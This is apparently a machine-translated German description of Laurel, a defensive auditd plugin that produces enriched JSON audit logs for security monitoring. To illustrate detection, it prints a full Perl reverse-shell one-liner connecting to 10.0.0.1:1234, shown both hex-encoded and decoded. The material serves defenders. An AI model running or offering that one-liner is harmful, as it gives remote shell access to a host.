laurel
v0.6.4
Laurel ist ein Event-Post-Prozessing-Plugin für Auditd (8) , das nützliche, angereicherte JSON-basierte Audit-Protokolle generiert, die für moderne Sicherheitsüberwachungsaufbindungen geeignet sind.
Die Dokumentation, die der neuesten stabilen Version entspricht, finden Sie hier.
TLDR: Anstelle von Audit -Ereignissen, die so aussehen ...
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
… Laurel verwandelt sie in JSON -Protokolle, wobei das Chaos, dass Angreifer/Penetrationstester/rote Teamer versuchen zu machen, auf den ersten Blick offensichtlich:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
Dies geschieht bei der Quelle, da Laurel auf dem Host läuft, in dem die Audit -Events generiert werden. Die Ereignisse sind mit nützlichen Informationen über den übergeordneten Prozess (PPID) angereichert:
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Konfigurations- und Betriebsdetails sind auf der Handbuchseite Laurel (8) beschrieben. Details zum Protokollformat und zum Rationales finden Sie auf der Handbuchseite von Laurel-über (7). Die Seite von Laurel-Awwit-Rules (7) enthält Ratschläge und Beispiele für die Konfiguration von Prüfungsregeln, die für die Erkennung von Angreifer-Taktiken nützlich sind.
Die Laurel -Installationsanweisungen enthalten Anweisungen zum Erstellen von Laruel aus der Quelle und zum Installieren und Konfigurieren.
Wir haben Laurel entwickelt, weil wir uns nicht mit Feature -Sets und Leistungsmerkmalen bestehender Projekte und Produkte zufrieden hatten. Weitere Informationen finden Sie im Leistungsdokument.
GNU Allgemeine öffentliche Lizenz, Version 3
Das Logo wurde von Birgit Meyer <[email protected]> erstellt.
